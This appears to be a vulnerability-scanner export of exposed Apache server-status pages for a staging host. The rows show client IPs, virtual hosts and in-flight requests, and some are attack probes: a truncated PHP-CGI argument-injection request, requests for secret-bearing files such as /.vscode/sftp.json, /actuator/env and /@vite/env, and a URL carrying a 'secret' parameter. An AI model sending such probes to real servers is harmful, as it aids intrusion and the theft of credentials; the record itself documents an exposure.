32.8623966526817750.08.95185.23 172.70.208.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4640879620/395/6804_ 32.502341117827090.015.42180.34 152.53.239.248http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4640879620/377/6682_ 32.85992413791770.030.91245.24 165.225.92.143http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-4640879620/399/7035_ 32.42250079232210.08.09221.64 222.74.183.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/3/3/0/3 (open/recv/resp/push/rst) 3-4640879620/401/6337_ 32.9112241614557870.013.71174.75 172.69.9.112h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4640879620/415/7616_ 32.601173728057960.07.59230.47 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4640878280/27/5083_ 13.8711544241939860.00.60186.35 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4640878280/25/4446_ 13.701149125727550.00.06198.23 162.158.230.148h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4640878280/26/5103_ 13.8512043520791230.00.36120.85 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4640878280/28/5142_ 13.661199225558550.00.37178.56 162.158.49.150h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4640878280/29/4891_ 13.671149013723010.00.34124.74 162.158.49.150h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4640878280/28/4527_ 13.671620
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b278a262816
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 21-Sep-2025 05:53:44 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 43 Parent Server MPM Generation: 42 Server uptime: 8 days 16 hours 32 minutes 42 seconds Server load: 0.10 0.03 0.01 Total accesses: 320111 - Total Traffic: 9.1 GB - Total Duration: 108662183 CPU Usage: u32.17 s32.67 cu1530.28 cs822.24 - .322% CPU load .426 requests/sec - 12.7 kB/second - 29.7 kB/request - 339.452 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03956061no0yes010000 13956060no0yes010000 23956062no1yes19000 33956217no1yes010000 43956059no0yes010000 Sum502 149000 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4239560610/1/6876_ 0.13762021035140.00.00166.71 141.101.76.9h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/3/6857_ 1.96762018820200.00.05199.46 172.71.235.36h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/3/7395_ 1.78763025753480.00.00280.53 172.71.151.232h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/5/7065_ 1.96763021392350.00.00212.01 172.71.238.210h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/2/7260_ 1.96763019788930.00.00170.69 172.71.239.9h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/3/7374_ 1.95763027368320.00.02194.18 172.69.114.105h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/4/7252_ 1.96763030233310.00.00146.01 172.71.238.101h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/2/6875_ 1.77763022246060.00.04216.98 172.71.151.129h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/4/7188_ 1.94766128685180.00.01192.19 172.68.234.184h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4239560610/3/6948_ 1.95761025660700.00.00247.21 172.70.108.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/28/8513_ 4.04437017021630.07.63203.18 172.71.151.101h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/32/9031_ 4.6843733921849630.00.46231.71 172.68.234.64http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/32/8579_ 4.04705215416250940.00.29185.86 172.68.234.64h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-4239560600/32/8597_ 4.69764018929760.00.58220.40 172.68.234.196h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/35/8999_ 2.88769016834330.00.55193.52 172.68.176.135h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-4239560600/24/9522_ 4.7271433721592280.00.47227.26 172.64.237.20h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/31/9093_ 4.69704038694200.00.44227.78 172.69.138.122h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/35/9475_ 4.81442016388500.00.63229.05 162.158.126.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/31/8058_ 4.117643317149800.00.54182.23 172.64.236.5h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4239560600/27/9021_ 4.7271037514595260.00.98161.94 172.64.237.20h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-4239560620/50/5344_ 4.662028584160.01.04141.20 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-4239560620/52/5106_ 4.662020066540.07.76194.75 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-4239560620/38/5459_ 4.660015049620.021.04163.05 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-4239560620/44/5300_ 4.6221039440920.01.60206.98 146.190.242.161h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4239560620/56/5321_ 4.661020731640.01.22220.99 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-4239560620/42/5226_ 4.661019516740.00.40200.58 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-4239560620/51/5474_ 4.660026907170.02.21185.94 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-4239560620/39/5165_ 4.662023160590.00.97117.11 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-4239560620/58/5419W 4.610022379160.00.84140.31 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-4239560620/56/5262_ 4.630041689160.00.66210.78 146.190.242.161h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-4239562170/71/5864_ 7.1051011563500.08.37186.78 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4239562170/78/5568_ 7.1931318463150.01.25180.21 146.190.242.161http/1.1 3-4239562170/75/5924_ 7.203311138340.01.66175.87 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-4239562170/63/5691_ 7.211010914250.01.37170.86 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-4239562170/67/5709_ 7.205911261820.08.73154.86 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 3-4239562170/73/5951_ 7.18585614879820.00.96156.29 141.101.97.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4239562170/81/5850_ 7.213410635010.030.03186.03 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-4239562170/69/6169_ 7.16392173146800.029.37193.55 146.190.242.161http/1.1 3-4239562170/63/5484_ 7.06453911591980.08.44144.55 146.190.242.161h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-4239562170/75/6735_ 7.100021335180.02.11199.83 146.190.242.161h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-4239560590/2/5033_ 0.71763013858300.00.00185.08 172.68.176.140h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-4239560590/3/4397_ 1.86763014363640.00.01196.97 172.71.151.32h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4239560590/4/5047_ 2.06764020434520.00.02119.69 172.71.235.77h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4239560590/0/5092_ 0.007596025389100.00.00176.26 162.158.120.218h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4239560590/3/4838_ 2.06768013528440.00.00123.49 172.71.239.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4239560590/3/4475_ 1.87761021995120.00.01217.92 172.71.151.18h2lcftech.es:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27e4143420
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 20-Sep-2025 19:53:30 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 8 days 6 hours 32 minutes 28 seconds Server load: 0.03 0.14 0.09 Total accesses: 313264 - Total Traffic: 8.8 GB - Total Duration: 106577938 CPU Usage: u68.28 s59.27 cu1440.43 cs761 - .326% CPU load .438 requests/sec - 12.9 kB/second - 29.3 kB/request - 340.218 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03929980no0yes19000 13929849no0yes010000 23929851no0yes010000 33929850no0yes010000 43929848no0yes010000 Sum500 149000 W_________________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3939299800/382/6648W 26.250020436900.08.61163.66 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3939299800/409/6621_ 26.29119918222050.07.65194.45 139.59.132.8http/1.1 0-3939299800/380/7164_ 26.410025117960.028.19268.30 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3939299800/395/6809_ 26.410020710540.08.02207.60 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-3939299800/381/7020_ 26.410019022160.010.98162.89 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-3939299800/374/7127_ 26.400326666540.010.41191.00 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-3939299800/380/6997_ 26.410029505450.09.13140.81 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3939299800/372/6637_ 26.3411221621840.06.10208.44 139.59.132.8http/1.1 0-3939299800/376/6950_ 26.3604127905320.014.74176.74 162.158.120.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939299800/386/6732_ 26.371025060530.016.54243.76 139.59.132.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3939298490/14/8469_ 10.982361016874780.00.07195.17 162.158.10.194h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/10/8986_ 10.55649021649940.00.03231.07 172.68.12.130h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/11/8532_ 10.992361016102750.00.18185.41 162.158.10.184h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/12/8552_ 10.972363018774800.00.04219.68 62.174.174.150http/1.1excel.tandemhse.com:80OPTIONS /lcf/ HTTP/1.1 1-3939298490/11/8950_ 11.6722337816673880.00.19192.70 172.70.43.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/9/9483_ 10.972363021502430.00.03226.54 62.174.174.150http/1.1excel.tandemhse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/6/9046_ 10.98649038569290.00.04227.03 172.68.54.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/9/9428_ 11.53654016291160.00.38228.35 172.71.172.170h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/11/8011_ 10.98218217003520.00.04181.53 172.68.54.123h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939298490/11/8980_ 10.62218014441880.00.26160.03 162.158.95.175h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939298510/301/5084_ 24.8101026806450.014.62130.56 139.59.132.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3939298510/287/4881_ 24.640019382890.029.84182.99 108.162.237.41h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939298510/282/5248_ 24.870014504680.012.08136.84 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3939298510/308/5061_ 24.870038754590.08.62202.26 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-3939298510/311/5059_ 24.831020101310.06.66197.96 139.59.132.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3939298510/369/5002_ 24.870018790790.010.13196.13 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3939298510/300/5210_ 24.8401026233220.06.75180.43 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 2-3939298510/306/4904_ 24.871222336160.07.60110.84 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3939298510/331/5160_ 24.870021600600.06.90134.81 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-3939298510/282/4998_ 24.78138740936020.04.81206.71 139.59.132.8http/1.1 3-3939298500/9/5736_ 10.271714011081890.00.09176.83 172.71.144.63h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939298500/13/5425_ 10.642374167218011780.01.73177.53 62.174.174.150http/1.1excel.tandemhse.com:80GET /lcf/index_lcf.php?secret=YWlzIHNlY3MgbWFpIGNvdWVu&view=con 3-3939298500/13/5773_ 9.651719110649890.00.09158.50 172.68.213.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939298500/12/5562_ 10.321221010473020.00.44168.35 62.174.174.150http/1.1excel.tandemhse.com:80OPTIONS /lcf/ HTTP/1.1 3-3939298500/11/5568_ 9.761714010855970.00.93145.34 162.158.42.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939298500/10/5815_ 10.011221114451580.00.19153.94 162.158.86.169h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939298500/12/5694_ 8.892369210164160.00.17154.96 172.71.150.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939298500/11/6020_ 10.991226272770290.00.67162.60 172.71.23.116h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939298500/12/5354_ 10.821719011154530.00.16135.03 162.158.111.31h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939298500/9/6591_ 9.651226020833330.00.02196.90 172.68.213.146h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939298480/17/5025_ 10.7421844813857990.00.53185.04 157.245.39.56h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-3939298480/22/4384_ 11.480014353120.00.66196.62 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-3939298480/25/5035_ 11.07246118420431160.01.36119.66 172.71.23.10h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939298480/15/5077_ 10.935781225346220.01.69175.86 94.103.87.196http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939298480/22/4828_ 10.5424652313526410.02.15123.46 104.23.172.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939298480/25/4458_ 10.86578021981030.00.42217.48 47.128.62.110http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b277c67eb0f
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 20-Sep-2025 09:03:25 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 38 Parent Server MPM Generation: 37 Server uptime: 7 days 19 hours 42 minutes 22 seconds Server load: 0.07 0.08 0.09 Total accesses: 305335 - Total Traffic: 8.5 GB - Total Duration: 99497554 CPU Usage: u35.83 s36.42 cu1416.78 cs744.77 - .331% CPU load .452 requests/sec - 13.2 kB/second - 29.2 kB/request - 325.864 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03919449no0yes010000 13919450no0yes010000 23919582no0yes19000 33919451no0yes010000 43919448no0yes010000 Sum500 149000 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3739194490/131/6246_ 9.4011017430440.01.95154.47 157.245.36.108http/1.1 0-3739194490/140/6186_ 9.520014813150.01.97186.46 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3739194490/143/6763_ 9.501934223036730.02.78239.75 172.71.30.80h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-3739194490/153/6392_ 9.39123419442840.03.09199.27 157.245.36.108http/1.1 0-3739194490/154/6605_ 9.520014927420.02.83151.34 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3739194490/155/6712_ 9.491932324633530.017.05173.23 172.71.30.80h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3739194490/137/6575_ 9.521227591180.02.69131.27 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-3739194490/143/6245_ 9.4711019599600.02.10201.91 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 0-3739194490/157/6551_ 9.530023281000.03.00160.93 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3739194490/142/6313_ 9.5119020965510.02.28226.78 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 1-3739194500/5/8454_ 3.17207567716853540.00.36195.09 172.71.182.236h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3739194500/4/8975_ 3.23208053121640970.00.11231.04 162.158.123.3h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3739194500/4/8521_ 3.17207528016091460.00.19185.24 172.71.183.25h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3739194500/4/8540_ 3.2812918771380.00.01219.64 157.245.36.108http/1.1 1-3739194500/4/8937_ 4.100016664420.00.01192.37 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-3739194500/6/9474_ 3.372081021501830.00.05226.50 172.71.124.33h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3739194500/3/9039_ 3.12232240738542940.00.04226.85 172.71.95.38h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3739194500/2/9418_ 3.362111716273900.00.01227.96 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 1-3739194500/3/7999_ 3.13211196816992740.00.12181.49 172.71.95.26h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3739194500/3/8966_ 3.1621111614401020.00.01159.77 152.53.239.248http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3739195820/150/4755_ 10.020019180100.01.16115.48 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-3739195820/155/4571_ 10.020014399160.03.21152.92 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3739195820/145/4939_ 10.010913445210.09.35124.46 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 2-3739195820/138/4728_ 10.020037580600.02.52193.19 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-3739195820/131/4720_ 9.91081913709150.04.64190.58 157.245.36.108h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3739195820/137/4611W 9.970017663990.09.96185.62 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3739195820/130/4880_ 9.99021925020520.03.99173.12 157.245.36.108http/1.1 2-3739195820/144/4561_ 10.020014583410.03.08102.46 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-3739195820/145/4808_ 10.021320502960.02.76127.50 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3739195820/147/4685_ 9.90020032022670.011.03201.49 104.23.190.9h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3739194510/6/5727_ 3.5757235811077020.00.06176.74 172.70.248.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3739194510/6/5410_ 3.3357271517962840.00.03175.79 104.23.168.19h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3739194510/5/5759_ 4.0057734710631990.00.19158.40 188.114.111.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3739194510/5/5550_ 3.341130410450270.00.17167.91 157.245.36.108h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3739194510/4/5556_ 3.310810843930.00.01144.41 80.75.212.17http/1.1 3-3739194510/8/5804_ 4.044477314427210.00.70153.75 180.191.186.170http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 3-3739194510/7/5681_ 3.341141610161560.00.12154.80 157.245.36.108h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3739194510/6/6009_ 4.180072768100.00.05161.94 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3739194510/5/5341_ 3.6044733111146380.00.12134.86 162.158.164.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3739194510/10/6582_ 3.62115020831940.00.76196.87 157.245.36.108h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-3739194480/14/5008_ 3.10192460013802160.00.44184.51 104.23.170.192h2lcftech.es:443idle, streams: 0/1/0/0/1 (open/recv/resp/push/rst) 4-3739194480/18/4359_ 3.92192457314316060.00.46195.95 104.23.170.94h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3739194480/16/5010_ 3.921929112620350470.00.42118.30 104.23.166.123h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3739194480/14/5060_ 4.44101058225311090.00.43174.17 104.23.166.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3739194480/18/4803_ 4.141929013409320.00.59121.22 172.71.147.240h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3739194480/16/4430_ 3.1110059821923780.013.17217.03 13.79.87.25http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3739194480/17/5337_ 3.92100
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27e3a35cb0
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 19-Sep-2025 01:43:22 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 6 days 12 hours 22 minutes 19 seconds Server load: 0.09 0.07 0.03 Total accesses: 273950 - Total Traffic: 7.3 GB - Total Duration: 84269355 CPU Usage: u73.42 s55.72 cu1187.02 cs604.55 - .341% CPU load .487 requests/sec - 13.5 kB/second - 27.8 kB/request - 307.609 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03851039no0yes010000 13851040no3yes19012 23851174no0yes010000 33851041no0yes010000 43851038no0yes010000 Sum503 149012 __________________W_______________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2938510390/28/5617_ 8.692214016250640.00.94143.39 141.101.76.92h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/33/5593_ 9.201420013657800.00.29177.02 188.114.111.229h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/21/6235_ 10.431415021763640.00.75227.47 172.68.150.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/27/5786_ 9.02234017934330.00.36177.49 89.248.168.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/33/6040_ 9.7322938613631590.00.72137.37 172.71.150.8h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/27/6159_ 10.572214223116690.00.34147.89 185.242.226.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-2938510390/23/6050_ 10.60229026310100.00.30120.66 162.158.123.148h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/25/5667_ 10.561415018275650.00.44179.77 162.158.22.13h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/20/5994_ 10.821420021921620.00.12149.61 108.162.237.188h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2938510390/33/5772_ 11.14234019607060.00.74194.41 172.69.168.182h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2938510400/334/7697_ 27.521014953820.022.97179.79 